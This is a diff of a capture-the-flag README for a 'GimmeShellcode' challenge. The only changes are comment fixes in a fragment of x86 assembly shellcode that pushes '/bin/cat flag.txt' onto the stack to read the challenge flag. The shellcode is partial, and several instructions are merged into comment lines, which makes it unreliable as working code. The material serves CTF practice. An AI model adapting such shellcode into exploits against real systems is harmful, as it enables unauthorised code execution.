neuronflicker/CTF/UCF/Scripting_GimmeShellcode/README.md

          section .text

 _start:  xor eax, eax               ; Start with EAX at 0
-         push eax                   ; The 0 terminator for our string push 0x7461632f            ; Push the executable string (/bin/cat) to the stack push 0x6e69622f            ;
+         push eax                   ; The null terminator for our string push 0x7461632f            ; Push the executable string (/bin/cat) to the stack push 0x6e69622f            ;
          mov ebx, esp               ; Set EBX so it points to the command

-         push eax                   ; Null terminate the argument string push 0x7478742e            ; Push the argument (flag.tx) to the stack push 0x67616c66            ;
+         push eax                   ; Null terminate the argument string push 0x7478742e            ; Push the argument (flag.txt) to the stack push 0x67616c66            ;
          mov esi, esp               ; Save the pointer in ESI

-         ; The argv list is a list of pointers to strings ; ECX points at the start of this list and it is ; NULL terminated
+         ; The argv list is a list of pointers to strings ; ECX points at the start of this list and the list is ; NULL terminated
          push eax                   ; Null terminate our argv list push esi                   ; Push the pointer to the argument (flag.txt)